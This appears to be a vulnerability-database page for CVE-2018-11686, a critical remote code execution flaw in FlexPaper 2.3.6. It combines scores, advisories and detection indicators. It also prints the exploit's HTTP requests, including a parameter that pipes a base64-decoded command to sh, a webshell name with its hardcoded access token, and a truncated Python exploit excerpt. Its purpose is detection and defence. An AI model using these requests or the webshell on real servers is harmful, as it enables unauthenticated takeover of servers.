CVE-2018-11686
published 2019-07-03CVE-2018-11686: The Publish Service in FlexPaper (later renamed FlowPaper) 2.3.6 allows remote code execution via setup.php and change_config.php.
PriorityP189critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
49.79%
98.8th percentile
The Publish Service in FlexPaper (later renamed FlowPaper) 2.3.6 allows remote code execution via setup.php and change_config.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| flowpaper | flexpaper | <= 2.3.6 | — |
Detection & IOCsextracted from sources · hover to see the quote
commandGET /php/setup.php?step=4&PDF2SWF_PATH=echo+{{cmd_b}}+%7C+base64+-d+%7C+sh+%3Econfig/output.txt%3B HTTP/1.1↗
commandPOST /php/change_config.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
SAVE_CONFIG=1&SWF_Directory=config/↗
- →Detect exploitation attempt via POST to change_config.php with SAVE_CONFIG parameter ↗
- →Detect RCE trigger via GET request to setup.php with step=4 and PDF2SWF_PATH parameter containing shell commands ↗
- →Detect webshell access via tiger_shell.php with hardcoded access token 09877376116472742784324824mxmmxm in query string ↗
- →A successful config-save step redirects to index.php?msg=Configuration%20saved! — presence of this redirect confirms the precondition for RCE is met ↗
- →Monitor for creation or access of /php/config/output.txt, which is used to capture command output during exploitation ↗
- →Shodan/FOFA exposure query: search for servers with title 'FlexPaper' to identify potentially vulnerable internet-facing instances ↗
- ·The exploit drops a webshell (tiger_shell.php) under /php/ with a hardcoded access token; defenders should scan for this file as a post-exploitation persistence indicator ↗
- ·The RCE chain requires two stages: first a POST to change_config.php to set SWF_Directory, then a GET to setup.php with a base64-encoded shell command in PDF2SWF_PATH — detection logic must account for both steps ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-pqf7-xmp7-f2q9: The Publish Service in FlexPaper (later renamed FlowPaper) 2
ghsa_unreviewed·2022-05-24
CVE-2018-11686 [CRITICAL] CWE-20 GHSA-pqf7-xmp7-f2q9: The Publish Service in FlexPaper (later renamed FlowPaper) 2
The Publish Service in FlexPaper (later renamed FlowPaper) 2.3.6 allows remote code execution via setup.php and change_config.php.
VulnCheck
flowpaper flexpaper Improper Input Validation
vulncheck·2018·CVSS 9.8
CVE-2018-11686 [CRITICAL] flowpaper flexpaper Improper Input Validation
flowpaper flexpaper Improper Input Validation
The Publish Service in FlexPaper (later renamed FlowPaper) 2.3.6 allows remote code execution via setup.php and change_config.php.
Affected: flowpaper flexpaper
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-14&host_type=src&vulnerability=cve-2018-11686; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-24&host_type=src&vulnerability=cve-2018-11686; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-12&host_type=src&vulnerability=cve-2018-11686; https://d
No detection rules found.
Exploit-DB
Flexpaper PHP Publish Service 2.3.6 - Remote Code Execution
exploitdb·2019-03-11·CVSS 9.8
CVE-2018-11686 [CRITICAL] Flexpaper PHP Publish Service 2.3.6 - Remote Code Execution
Flexpaper PHP Publish Service 2.3.6 - Remote Code Execution
---
#!/usr/bin/env python
#Exploit Title: FlexPaper PHP Publish Service >")
cmd = cmd.strip()
cmd = cmd.encode('base64').strip().replace("\n","")
link = url+"/php/tiger_shell.php?cmd=%s&access=09877376116472742784324824mxmmxm" %cmd.strip()
#print link
try:
response = urllib2.urlopen(link, context=ctx)
page = response.read()
print page
except Exception as exc:
print exc
continue
Nuclei
FlexPaper/FlowPaper 2.3.6 - Remote Code Execution
nuclei·CVSS 9.8
CVE-2018-11686 [CRITICAL] FlexPaper/FlowPaper 2.3.6 - Remote Code Execution
FlexPaper/FlowPaper 2.3.6 - Remote Code Execution
The Publish Service in FlexPaper (later renamed FlowPaper) 2.3.6 allows remote code execution via setup.php and change_config.php.
Template:
id: CVE-2018-11686
info:
name: FlexPaper/FlowPaper 2.3.6 - Remote Code Execution
author: iamnoooob,pdresearch,pszyszkowski
severity: critical
description: |
The Publish Service in FlexPaper (later renamed FlowPaper) 2.3.6 allows remote code execution via setup.php and change_config.php.
impact: |
Unauthenticated attackers can execute arbitrary code on the server through the Publish Service, leading to complete server compromise and access to all hosted documents.
remediation: |
Upgrade to FlowPaper version 2.3.7 or later, or remove the vulnerable Publish Service.
reference:
- https://nvd.nist.gov/v
2019-07-03
Published
Exploited in the wild